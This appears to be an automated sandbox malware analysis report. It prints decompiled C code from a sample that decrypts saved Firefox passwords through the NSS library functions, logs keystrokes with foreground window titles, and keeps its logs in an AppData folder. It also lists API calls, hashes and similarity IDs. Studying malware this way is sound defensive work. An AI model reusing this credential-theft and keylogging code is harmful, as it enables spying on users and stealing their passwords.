                                      • Opcode Fuzzy Hash: 73d1c7d664325cbde4d1cc3a340fc9e6f6c49df9da99b8f92495fb75de3c1881
                                      • Instruction Fuzzy Hash: 3F91E2E1A0C115A7F6386258475867E3A51AB4D300FA0A277FAD377BA0C7DC0E42979F
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043A324, Relevance: 47.5, APIs: 10, Strings: 17, Instructions: 219libraryUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 98%
                                      			E0043A324(void* __ecx, void* __edx, WCHAR* _a4) {
				WCHAR* _v8;
				long _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				char _v24;
				char _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				short _v560;
				struct HINSTANCE__* _t135;
				WCHAR* _t158;
				intOrPtr _t194;
				void* _t206;
				void* _t216;
				void* _t218;

				_t206 = __edx;
				_t158 = 0;
				_t216 = __ecx;
				E00431052( &_v560, 0, 0x104);
				GetCurrentDirectoryW(0x104,  &_v560);
				SetCurrentDirectoryW(_a4);
				E00433297( &_a4, _t206, 0, "\\");
				E0043345A( &_v40,  &_a4);
				E00433297( &_v40, _t206, 0, L"nss3.dll");
				E0043345A( &_v20,  &_a4);
				E00433297( &_v20, _t206, 0, L"msvcr120.dll");
				E0043345A( &_v16,  &_a4);
				E00433297( &_v16, _t206, 0, L"msvcp120.dll");
				E0043345A( &_v36,  &_a4);
				E00433297( &_v36, _t206, 0, L"mozglue.dll");
				E0043345A( &_v32,  &_a4);
				E00433297( &_v32, _t206, 0, L"softokn3.dll");
				E0043345A( &_v28,  &_a4);
				E00433297( &_v28, _t206, 0, L"msvcp");
				E0043345A( &_v24,  &_a4);
				E00433297( &_v24, _t206, 0, L"msvcr");
				_t218 = 0x5a;
				_v12 = 0x104;
				while(1) {
					E0043345A( &_v8,  &_v28);
					E00433297(E0043309F( &_v8, _t206, 0, _v12), _t206, 0, L".dll");
					if(PathFileExistsW(_v8) != 0) {
						break;
					}
					_v12 = _v12 + 0xa;
					E00435A2D(_v8);
					_t224 = _v12 - 0x96;
					_v8 = _t158;
					if(_v12 != 0x96) {
						continue;
					} else {
						while(1) {
							L5:
							E0043345A( &_v8,  &_v24);
							E00433297(E0043309F( &_v8, _t206, _t224, _t218), _t206, _t224, L".dll");
							if(PathFileExistsW(_v8) != 0) {
								break;
							}
							_t218 = _t218 + 0xa;
							E00435A2D(_v8);
							_v8 = _t158;
							if(_t218 != 0x96) {
								continue;
							}
							L9:
							 *((intOrPtr*)(_t216 + 0xa8)) = LoadLibraryW(_v20);
							 *((intOrPtr*)(_t216 + 0xac)) = LoadLibraryW(_v16);
							 *((intOrPtr*)(_t216 + 0xb0)) = LoadLibraryW(_v36);
							 *((intOrPtr*)(_t216 + 0xb4)) = LoadLibraryW(_v40);
							_t135 = LoadLibraryW(_v32);
							 *(_t216 + 0xb8) = _t135;
							if( *((intOrPtr*)(_t216 + 0xac)) != _t158 &&  *((intOrPtr*)(_t216 + 0xb0)) != _t158) {
								_t194 =  *((intOrPtr*)(_t216 + 0xb4));
								if(_t194 != 0) {
									_t230 = _t135;
									if(_t135 != 0) {
										_push(_t194);
										 *((intOrPtr*)(_t216 + 0x68)) = E0043E907(_t194, "NSS_Init", _t230);
										 *((intOrPtr*)(_t216 + 0x80)) = E0043E907( *((intOrPtr*)(_t216 + 0xb4)), "PK11_GetInternalKeySlot", _t230);
										 *((intOrPtr*)(_t216 + 0x7c)) = E0043E907( *((intOrPtr*)(_t216 + 0xb4)), "PK11_Authenticate", _t230);
										 *((intOrPtr*)(_t216 + 0x70)) = E0043E907( *((intOrPtr*)(_t216 + 0xb4)), "PK11SDR_Decrypt", _t230);
										 *((intOrPtr*)(_t216 + 0x74)) = E0043E907( *((intOrPtr*)(_t216 + 0xb4)), "NSSBase64_DecodeBuffer", _t230);
										 *((intOrPtr*)(_t216 + 0x78)) = E0043E907( *((intOrPtr*)(_t216 + 0xb4)), "PK11_CheckUserPassword", _t230);
										 *((intOrPtr*)(_t216 + 0x6c)) = E0043E907( *((intOrPtr*)(_t216 + 0xb4)), "NSS_Shutdown", _t230);
										 *((intOrPtr*)(_t216 + 0x84)) = E0043E907( *((intOrPtr*)(_t216 + 0xb4)), "PK11_FreeSlot", _t230);
										 *((intOrPtr*)(_t216 + 0x88)) = E0043E907( *((intOrPtr*)(_t216 + 0xb4)), "PR_GetError", _t230);
										SetCurrentDirectoryW( &_v560);
										_t158 = 1;
									}
								}
							}
							E00435A2D(_v24);
							E00435A2D(_v28);
							E00435A2D(_v32);
							E00435A2D(_v36);
							E00435A2D(_v16);
							E00435A2D(_v20);
							E00435A2D(_v40);
							E00435A2D(_a4);
							return _t158;
						}
						E00433264( &_v20,  &_v8);
						E00435A2D(_v8);
						goto L9;
					}
				}
				E00433264( &_v16,  &_v8);
				E00435A2D(_v8);
				goto L5;
			}



















                                      0x0043a324
                                      0x0043a33c
                                      0x0043a33e
                                      0x0043a342
                                      0x0043a352
                                      0x0043a35b
                                      0x0043a369
                                      0x0043a375
                                      0x0043a382
                                      0x0043a38e
                                      0x0043a39b
                                      0x0043a3a7
                                      0x0043a3b4
                                      0x0043a3c0
                                      0x0043a3cd
                                      0x0043a3d9
                                      0x0043a3e6
                                      0x0043a3f2
                                      0x0043a3ff
                                      0x0043a40b
                                      0x0043a418
                                      0x0043a41f
                                      0x0043a420
                                      0x0043a423
                                      0x0043a42a
                                      0x0043a441
                                      0x0043a451
                                      0x00000000
                                      0x00000000
                                      0x0043a456
                                      0x0043a45a
                                      0x0043a45f
                                      0x0043a466
                                      0x0043a469
                                      0x00000000
                                      0x0043a46b
                                      0x0043a481
                                      0x0043a481
                                      0x0043a488
                                      0x0043a49d
                                      0x0043a4ad
                                      0x00000000
                                      0x00000000
                                      0x0043a4b2
                                      0x0043a4b5
                                      0x0043a4ba
                                      0x0043a4c3
                                      0x00000000
                                      0x00000000
                                      0x0043a4db
                                      0x0043a4e9
                                      0x0043a4f4
                                      0x0043a4ff
                                      0x0043a50a
                                      0x0043a510
                                      0x0043a512
                                      0x0043a51e
                                      0x0043a530
                                      0x0043a538
                                      0x0043a53e
                                      0x0043a540
                                      0x0043a546
                                      0x0043a55c
                                      0x0043a56f
                                      0x0043a585
                                      0x0043a598
                                      0x0043a5ab
                                      0x0043a5be
                                      0x0043a5d1
                                      0x0043a5e4
                                      0x0043a5ef
                                      0x0043a5fd
                                      0x0043a605
                                      0x0043a605
                                      0x0043a540
                                      0x0043a538
                                      0x0043a609
                                      0x0043a611
                                      0x0043a619
                                      0x0043a621
                                      0x0043a629
                                      0x0043a631
                                      0x0043a639
                                      0x0043a641
                                      0x0043a64c
                                      0x0043a64c
                                      0x0043a4ce
                                      0x0043a4d6
                                      0x00000000
                                      0x0043a4d6
                                      0x0043a469
                                      0x0043a474
                                      0x0043a47c
                                      0x00000000

                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0043A352
                                      • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0043A35B
                                        • Part of subcall function 0043345A: lstrcpyW.KERNEL32(00000000,?), ref: 00433484
                                        • Part of subcall function 0043309F: wsprintfW.USER32 ref: 004330BA
                                      • PathFileExistsW.SHLWAPI(00439406), ref: 0043A449
                                      • PathFileExistsW.SHLWAPI(00439406), ref: 0043A4A5
                                      • LoadLibraryW.KERNEL32(?), ref: 0043A4E4
                                      • LoadLibraryW.KERNEL32(?), ref: 0043A4EF
                                      • LoadLibraryW.KERNEL32(?), ref: 0043A4FA
                                      • LoadLibraryW.KERNEL32(?), ref: 0043A505
                                      • LoadLibraryW.KERNEL32(?), ref: 0043A510
                                      • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0043A5FD
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad$CurrentDirectory$ExistsFilePath$FreeVirtuallstrcpywsprintf
                                      • String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
                                      • API String ID: 410702425-850564384
                                      • Opcode ID: f13c0fbf52b8ceaf8164bc2f03f1eebf023bea842679a3d285595bee91c5fe4e
                                      • Instruction ID: 9e88c3e77e91cfe5c3441bde6d7bc776bbfec12eaad2c05da36f296a98c7f872
                                      • Opcode Fuzzy Hash: f13c0fbf52b8ceaf8164bc2f03f1eebf023bea842679a3d285595bee91c5fe4e
                                      • Instruction Fuzzy Hash: 56916E70E00609ABDB04FFA1D986AEEB775BF18309F50512FF11663192DB786A14CB58
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00437CB3, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 277registrystringwindowUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E00437CB3(void* __ecx, void* __eflags, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				char _v524;
				short _v564;
				intOrPtr _v568;
				short _v570;
				short _v572;
				long _v596;
				char _v600;
				int _v604;
				char _v612;
				intOrPtr _v616;
				struct _OVERLAPPED* _v620;
				char _v624;
				char _v628;
				void* _v632;
				char _v636;
				intOrPtr _v640;
				struct _OVERLAPPED* _v644;
				char _v648;
				void* _t76;
				short _t77;
				void* _t82;
				char* _t84;
				struct _OVERLAPPED** _t86;
				long _t88;
				intOrPtr _t93;
				intOrPtr* _t96;
				long _t100;
				intOrPtr _t101;
				WCHAR* _t102;
				intOrPtr _t104;
				void* _t105;
				long _t109;
				void* _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				long _t116;
				intOrPtr _t117;
				intOrPtr _t119;
				long _t121;
				intOrPtr _t122;
				intOrPtr _t124;
				void* _t126;
				intOrPtr _t128;
				intOrPtr _t130;
				long _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				DWORD* _t136;
				long _t137;
				intOrPtr _t138;
				long _t142;
				void* _t152;
				long _t164;
				intOrPtr _t178;
				intOrPtr _t189;
				void* _t195;
				struct _OVERLAPPED* _t198;
				struct _OVERLAPPED* _t201;
				void* _t204;
				void* _t206;
				void* _t208;
				signed int _t209;
				void* _t212;
				void* _t213;

				_t198 = 0;
				_v600 = 0;
				E00431052( &_v524, 0, 0x208);
				_t212 = (_t209 & 0xfffffff8) - 0x25c + 0xc;
				_t201 = 0;
				_v604 = 0;
				_t76 = _a8 - 1;
				if(_t76 == 0) {
					_t77 = 6;
					_v570 = _t77;
					__eflags = 1;
					_v564 = _a4;
					_v568 = 0x130;
					_v572 = 1;
					__imp__RegisterRawInputDevices( &_v572, 1, 0xc);
				} else {
					_t82 = _t76 - 0xf;
					if(_t82 == 0) {
						PostQuitMessage(0);
					} else {
						if(_t82 == 0xef) {
							_t84 =  &_v600;
							__imp__GetRawInputData(_a16, 0x10000003, 0, _t84, 0x10);
							__eflags = _t84 - 0xffffffff;
							if(_t84 != 0xffffffff) {
								_t164 = E00435ADB(_v620);
								_v596 = _t164;
								__eflags = _t164;
								if(_t164 != 0) {
									_t86 =  &_v620;
									__imp__GetRawInputData(_a16, 0x10000003, _t164, _t86, 0x10);
									__eflags = _t86 - _v640;
									if(_t86 == _v640) {
										__eflags =  *((intOrPtr*)(_t164 + 0x18)) - 0x100;
										if( *((intOrPtr*)(_t164 + 0x18)) == 0x100) {
											_t88 = GetWindowTextW(GetForegroundWindow(),  &_v564, 0x104);
											__eflags = _t88;
											if(_t88 <= 0) {
												E0043312C( &_v644, _t195, L"Unknow");
											} else {
												E00433264( &_v648, E00433412( &_v636,  &_v564));
												E00435A2D(_v644);
											}
											E00438133( &_v632,  *((intOrPtr*)(_t164 + 0x16)));
											E00433264( &_v632,  &_v644);
											_t93 =  *0x446690; // 0x0
											E00433297( &_v624,  *((intOrPtr*)(_t164 + 0x16)), __eflags, _t93 + 0x10);
											_t96 =  *0x446690; // 0x0
											__eflags =  *_t96 - _t198;
											if( *_t96 != _t198) {
												_t213 = _t212 - 0x10;
												__eflags = _t96 + 0xa18;
												E00431301(_t213, _t96 + 0xa18, _t96 + 0xa18);
												_t208 = _t213 - 0x10;
												E0043345A(_t208,  &_v636);
												 *((intOrPtr*)(_t208 + 4)) = _v636;
												 *((short*)(_t208 + 8)) = _v632;
												E0043345A(_t208 + 0xc,  &_v628);
												_t152 = E0043460B( &_v612, __eflags);
												_t189 =  *0x446690; // 0x0
												E00434B53( *((intOrPtr*)(_t189 + 0xa50)), _t152);
												E004345E1( &_v648);
												_t96 =  *0x446690; // 0x0
											}
											__eflags =  *((intOrPtr*)(_t96 + 0xa14)) - _t198;
											if( *((intOrPtr*)(_t96 + 0xa14)) != _t198) {
												_t100 = lstrlenW(_t96 + 0x210);
												__eflags = _t100;
												_t101 =  *0x446690; // 0x0
												if(_t100 == 0) {
													L17:
													_t102 = _t101 + 0x210;
													__eflags = _t102;
													lstrcpyW(_t102, _v632);
													_t104 =  *0x446690; // 0x0
													 *(_t104 + 0xa10) = _t198;
												} else {
													_t142 = E00433075( &_v648, E00433412( &_v636, _t101 + 0x210));
													E00435A2D(_v644);
													_t101 =  *0x446690; // 0x0
													_v644 = _t198;
													__eflags = _t142;
													if(_t142 == 0) {
														goto L17;
													} else {
														 *((intOrPtr*)(_t101 + 0xa10)) = 1;
													}
												}
												_t105 = CreateFileW( *(_t104 + 0xc), 4, 1, _t198, 4, 0x80, _t198);
												_t178 =  *0x446690; // 0x0
												 *(_t178 + 4) = _t105;
												__eflags =  *((intOrPtr*)(_t178 + 0xa10)) - _t198;
												if(__eflags == 0) {
													_t49 = _t178 + 8; // 0x8
													_t204 = L"\r\n";
													_t116 = lstrlenW(_t204);
													_t117 =  *0x446690; // 0x0
													WriteFile( *(_t117 + 4), _t204, _t116, _t49, _t198);
													_t119 =  *0x446690; // 0x0
													_t121 = lstrlenW(_t204);
													_t122 =  *0x446690; // 0x0
													WriteFile( *(_t122 + 4), _t204, _t121, _t119 + 8, _t198);
													_t124 =  *0x446690; // 0x0
													_t126 = E0043308E( &_v632);
													_t128 =  *0x446690; // 0x0
													WriteFile( *(_t128 + 4), _v632, _t126 + _t126, _t124 + 8, _t198);
													_t130 =  *0x446690; // 0x0
													_t206 = L"\r\n";
													_t132 = lstrlenW(_t206);
													_t133 =  *0x446690; // 0x0
													WriteFile( *(_t133 + 4), _t206, _t132, _t130 + 8, _t198);
													_t135 =  *0x446690; // 0x0
													_t136 = _t135 + 8;
													__eflags = _t136;
													_t137 = lstrlenW(_t206);
													_t138 =  *0x446690; // 0x0
													WriteFile( *(_t138 + 4), _t206, _t137, _t136, _t198);
													_t178 =  *0x446690; // 0x0
												}
												_t58 = _t178 + 8; // 0x8
												_t109 = lstrlenW(E0043804D( *((intOrPtr*)(_v616 + 0x16)), __eflags)) + _t108;
												__eflags = _t109;
												_t110 = E0043804D( *((intOrPtr*)(_v616 + 0x16)), _t109);
												_t111 =  *0x446690; // 0x0
												WriteFile( *(_t111 + 4), _t110, _t109, _t58, _t198);
												_t113 =  *0x446690; // 0x0
												CloseHandle( *(_t113 + 4));
											}
											E00435A2D(_v620);
											_v620 = _t198;
											E00435A2D(_v632);
											_t201 = _v644;
										}
									}
								}
							}
						} else {
							_t198 = DefWindowProcA(_a4, _a8, _a12, _a16);
						}
					}
				}
				E00435A2D(_t201);
				return _t198;
			}



































































                                      0x00437cc2
                                      0x00437ccf
                                      0x00437cd3
                                      0x00437cdb
                                      0x00437cde
                                      0x00437ce0
                                      0x00437ce4
                                      0x00437ce7
                                      0x00438010
                                      0x00438013
                                      0x0043801b
                                      0x0043801e
                                      0x00438028
                                      0x00438030
                                      0x00438035
                                      0x00437ced
                                      0x00437ced
                                      0x00437cf0
                                      0x00438006
                                      0x00437cf6
                                      0x00437cfb
                                      0x00437d18
                                      0x00437d26
                                      0x00437d2c
                                      0x00437d2f
                                      0x00437d3e
                                      0x00437d40
                                      0x00437d44
                                      0x00437d46
                                      0x00437d4e
                                      0x00437d5c
                                      0x00437d62
                                      0x00437d66
                                      0x00437d6c
                                      0x00437d73
                                      0x00437d8a
                                      0x00437d90
                                      0x00437d92
                                      0x00437dc0
                                      0x00437d94
                                      0x00437da7
                                      0x00437db0
                                      0x00437db0
                                      0x00437dcc
                                      0x00437dda
                                      0x00437ddf
                                      0x00437dec
                                      0x00437df1
                                      0x00437df6
                                      0x00437df8
                                      0x00437dfa
                                      0x00437dfd
                                      0x00437e05
                                      0x00437e11
                                      0x00437e16
                                      0x00437e22
                                      0x00437e2a
                                      0x00437e33
                                      0x00437e3c
                                      0x00437e41
                                      0x00437e4e
                                      0x00437e57
                                      0x00437e5c
                                      0x00437e5c
                                      0x00437e61
                                      0x00437e67
                                      0x00437e73
                                      0x00437e7c
                                      0x00437e7e
                                      0x00437e83
                                      0x00437ebe
                                      0x00437ec2
                                      0x00437ec2
                                      0x00437ec8
                                      0x00437ece
                                      0x00437ed3
                                      0x00437e85
                                      0x00437e99
                                      0x00437ea4
                                      0x00437ea9
                                      0x00437eae
                                      0x00437eb2
                                      0x00437eb4
                                      0x00000000
                                      0x00437eb6
                                      0x00437eb6
                                      0x00437eb6
                                      0x00437eb4
                                      0x00437ee8
                                      0x00437eee
                                      0x00437efa
                                      0x00437efd
                                      0x00437f03
                                      0x00437f0a
                                      0x00437f0d
                                      0x00437f14
                                      0x00437f1b
                                      0x00437f24
                                      0x00437f26
                                      0x00437f31
                                      0x00437f38
                                      0x00437f41
                                      0x00437f43
                                      0x00437f55
                                      0x00437f5d
                                      0x00437f66
                                      0x00437f68
                                      0x00437f6d
                                      0x00437f78
                                      0x00437f7f
                                      0x00437f88
                                      0x00437f8a
                                      0x00437f90
                                      0x00437f90
                                      0x00437f95
                                      0x00437f9c
                                      0x00437fa5
                                      0x00437fa7
                                      0x00437fa7
                                      0x00437fb1
                                      0x00437fc8
                                      0x00437fc8
                                      0x00437fcb
                                      0x00437fd1
                                      0x00437fd9
                                      0x00437fdb
                                      0x00437fe3
                                      0x00437fe3
                                      0x00437fed
                                      0x00437ff6
                                      0x00437ffa
                                      0x00437fff
                                      0x00437fff
                                      0x00437d73
                                      0x00437d66
                                      0x00437d46
                                      0x00437cfd
                                      0x00437d0f
                                      0x00437d0f
                                      0x00437cfb
                                      0x00437cf0
                                      0x0043803d
                                      0x0043804a

                                      APIs
                                      • DefWindowProcA.USER32(?,?,?,?), ref: 00437D09
                                      • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 00437D26
                                      • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 00437D5C
                                      • GetForegroundWindow.USER32 ref: 00437D79
                                      • GetWindowTextW.USER32(00000000,?,00000104), ref: 00437D8A
                                      • lstrlenW.KERNEL32(-00000210,-00000010,?,Unknow), ref: 00437E73
                                      • PostQuitMessage.USER32(00000000), ref: 00438006
                                      • RegisterRawInputDevices.USER32 ref: 00438035
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp Download File
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InputWindow$Data$DevicesForegroundMessagePostProcQuitRegisterTextlstrlen
                                      • String ID: Unknow
                                      • API String ID: 3853268301-1240069140
                                      • Opcode ID: fbe1fd052804266a5262294e517e48521792385bc430dc1a9c0f53960fa9ac82
                                      • Instruction ID: 109edb174f85ec2afc275b71d674f6efe1faf02fcd3e1164fe3f41ba2888cf3c
                                      • Opcode Fuzzy Hash: fbe1fd052804266a5262294e517e48521792385bc430dc1a9c0f53960fa9ac82
                                      • Instruction Fuzzy Hash: 61A1AE75104200AFC710EF65DC85DABBBB8FF8A304F06542EF95993261DB74E909CB6A
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0043822F, Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 229windowstringregistryUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E0043822F(void* __eflags, void* _a4) {
				short _v544;
				char _v696;
				short _v704;
				intOrPtr _v720;
				struct _WNDCLASSW _v760;
				void* _v784;
				struct tagMSG _v788;
				struct _SYSTEMTIME _v804;
				void* _v808;
				struct HINSTANCE__* _v812;
				long _v820;
				intOrPtr _t54;
				intOrPtr _t57;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t65;
				intOrPtr _t68;
				intOrPtr _t73;
				struct HWND__* _t77;
				int _t81;
				intOrPtr _t102;
				void* _t103;
				intOrPtr _t107;
				void* _t115;
				void* _t121;
				struct HINSTANCE__* _t122;
				struct HWND__* _t123;
				intOrPtr _t125;
				signed int _t126;
				signed int _t132;
				intOrPtr _t135;
				intOrPtr _t138;
				void* _t146;
				void* _t147;
				long _t151;
				void* _t156;
				void* _t157;
				signed int _t159;
				signed int _t160;
				void* _t162;
				signed int _t163;
				void* _t168;

				_t122 = GetModuleHandleA(0);
				_v804.wSecond = _t122;
				_v788.hwnd = _v788.hwnd & 0;
				_t126 = 0xa;
				memset( &(_v760.hIcon), 0, _t126 << 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t54 =  *0x446690; // 0x0
				_t151 = 0;
				E00431052(_t54 + 0x210, 0, 0x800);
				_t57 =  *0x446690; // 0x0
				E00431052(_t57 + 0x10, 0, 0x208);
				_t60 =  *0x446690; // 0x0
				_t168 = (_t163 & 0xfffffff8) - 0x314 + 0x24;
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t60 + 0x10, _t147, _t157, _t121);
				_t62 =  *0x446690; // 0x0
				lstrcatW(_t62 + 0x10, L"\\Microsoft Vision\\");
				_t65 =  *0x446690; // 0x0
				CreateDirectoryW(_t65 + 0x10, 0);
				_t68 =  *0x446690; // 0x0
				_t171 =  *((intOrPtr*)(_t68 + 0xa14));
				if( *((intOrPtr*)(_t68 + 0xa14)) != 0) {
					E00431052( &_v544, 0, 0x208);
					_t107 =  *0x446690; // 0x0
					_t168 = _t168 + 0xc;
					lstrcpyW( &_v544, _t107 + 0x10);
					lstrcatW( &_v544, "*");
					E00433412(_t168,  &_v544);
					_t115 = E0043DEC5( &(_v760.lpszClassName), _t171, 0);
					_t125 =  *0x446690; // 0x0
					_t156 = _t115;
					_t13 = _t125 + 0xa18; // 0xa18
					E00431815(_t13, _t171);
					_t162 = 0;
					if( *((intOrPtr*)(_t156 + 8)) > 0) {
						do {
							_t168 = _t168 - 0x18;
							E00431862(_t156, _t168, _t162);
							_t15 = _t125 + 0xa18; // 0xa18
							E00431716(_t15);
							_t162 = _t162 + 1;
						} while (_t162 <  *((intOrPtr*)(_t156 + 8)));
					}
					_t143 = _v720;
					if(_v720 != 0) {
						E00431A75(_t143, _t143);
					}
					_t122 = _v812;
					_t151 = 0;
				}
				_t146 = 4;
				_t159 = E004332D4( &_v812, _t146, 0);
				E00433162(E00433297( &_v808, _t146, 0, L"ExplorerIdentifier"), 0, _t159);
				E00435A2D(_v820);
				_t73 =  *0x446690; // 0x0
				_v820 = _t151;
				if( *((intOrPtr*)(_t73 + 0xa14)) != _t151) {
					GetLocalTime( &_v804);
					wsprintfW( &_v704, L"%02d-%02d-%02d_%02d.%02d.%02d", _v804.wDay & 0x0000ffff, _v804.wMonth & 0x0000ffff, _v804.wYear & 0x0000ffff, _v804.wHour & 0x0000ffff, _v804.wMinute & 0x0000ffff, _v804.wSecond & 0x0000ffff);
					_t135 =  *0x446690; // 0x0
					_t168 = _t168 + 0x20;
					_t33 = _t135 + 0x10; // 0x10
					E00433297(E00433297(_t135 + 0xc, _t146, _t135 + 0xc, _t33), _t146, _t135 + 0xc,  &_v696);
					_t102 =  *0x446690; // 0x0
					_t103 = CreateFileW( *(_t102 + 0xc), 0x10000000, 1, _t151, 2, 0x80, _t151);
					_t138 =  *0x446690; // 0x0
					 *(_t138 + 4) = _t103;
					CloseHandle(_t103);
				}
				_v760.lpszClassName = _v808;
				_v760.lpfnWndProc = E00437CB3;
				_v760.hInstance = _t122;
				RegisterClassW( &_v760);
				_t77 = CreateWindowExW(_t151, _v760.lpszClassName, _t151, _t151, _t151, _t151, _t151, _t151, 0xfffffffd, _t151, _t122, _a4);
				_t132 = 7;
				_t123 = _t77;
				memset( &_v788, 0, _t132 << 2);
				_t81 = GetMessageA( &_v788, _t123, 0, 0);
				if(_t81 == 0) {
					L12:
					_t160 = _v788.wParam;
				} else {
					_t160 = _t159 | 0xffffffff;
					while(_t81 != _t160) {
						TranslateMessage( &_v788);
						DispatchMessageA( &_v788);
						_t81 = GetMessageA( &_v788, _t123, 0, 0);
						if(_t81 != 0) {
							continue;
						} else {
							goto L12;
						}
						goto L13;
					}
				}
				L13:
				E00435A2D(_v808);
				return _t160;
			}













































                                      0x00438246
                                      0x0043824e
                                      0x00438252
                                      0x00438258
                                      0x00438259
                                      0x0043825f
                                      0x00438265
                                      0x00438266
                                      0x00438267
                                      0x00438268
                                      0x0043826d
                                      0x00438276
                                      0x0043827b
                                      0x0043828d
                                      0x00438292
                                      0x00438297
                                      0x004382a3
                                      0x004382a9
                                      0x004382bd
                                      0x004382bf
                                      0x004382c9
                                      0x004382cf
                                      0x004382d4
                                      0x004382da
                                      0x004382ee
                                      0x004382f3
                                      0x004382f8
                                      0x00438307
                                      0x0043831a
                                      0x00438327
                                      0x00438330
                                      0x00438335
                                      0x0043833b
                                      0x0043833e
                                      0x00438344
                                      0x00438349
                                      0x0043834e
                                      0x00438350
                                      0x00438350
                                      0x00438359
                                      0x0043835e
                                      0x00438364
                                      0x00438369
                                      0x0043836a
                                      0x00438350
                                      0x0043836f
                                      0x00438375
                                      0x00438378
                                      0x00438378
                                      0x0043837d
                                      0x00438381
                                      0x00438381
                                      0x00438385
                                      0x00438398
                                      0x004383a2
                                      0x004383ab
                                      0x004383b0
                                      0x004383b5
                                      0x004383bf
                                      0x004383ca
                                      0x00438401
                                      0x00438407
                                      0x00438414
                                      0x00438418
                                      0x00438426
                                      0x0043842b
                                      0x00438443
                                      0x00438449
                                      0x00438450
                                      0x00438453
                                      0x00438453
                                      0x0043845d
                                      0x00438466
                                      0x0043846e
                                      0x00438472
                                      0x0043848d
                                      0x00438495
                                      0x00438496
                                      0x004384a0
                                      0x004384ae
                                      0x004384b2
                                      0x004384e1
                                      0x004384e1
                                      0x004384b4
                                      0x004384b4
                                      0x004384b7
                                      0x004384c0
                                      0x004384cb
                                      0x004384db
                                      0x004384df
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004384df
                                      0x004384b7
                                      0x004384e5
                                      0x004384e9
                                      0x004384f6

                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00438240
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 004382A3
                                      • lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 004382BD
                                      • CreateDirectoryW.KERNEL32(-00000010,00000000), ref: 004382C9
                                      • lstrcpyW.KERNEL32(?,-00000010), ref: 00438307
                                      • lstrcatW.KERNEL32(?,00442928), ref: 0043831A
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 0043DEC5: FindFirstFileW.KERNEL32(?,?), ref: 0043DEF2
                                      • GetLocalTime.KERNEL32(?,00000000,ExplorerIdentifier), ref: 004383CA
                                      • wsprintfW.USER32 ref: 00438401
                                      • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000), ref: 00438443
                                      • CloseHandle.KERNEL32(00000000), ref: 00438453
                                      • RegisterClassW.USER32 ref: 00438472
                                      • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,?), ref: 0043848D
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004384AE
                                      • TranslateMessage.USER32(?), ref: 004384C0
                                      • DispatchMessageA.USER32(?), ref: 004384CB
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004384DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp Download File
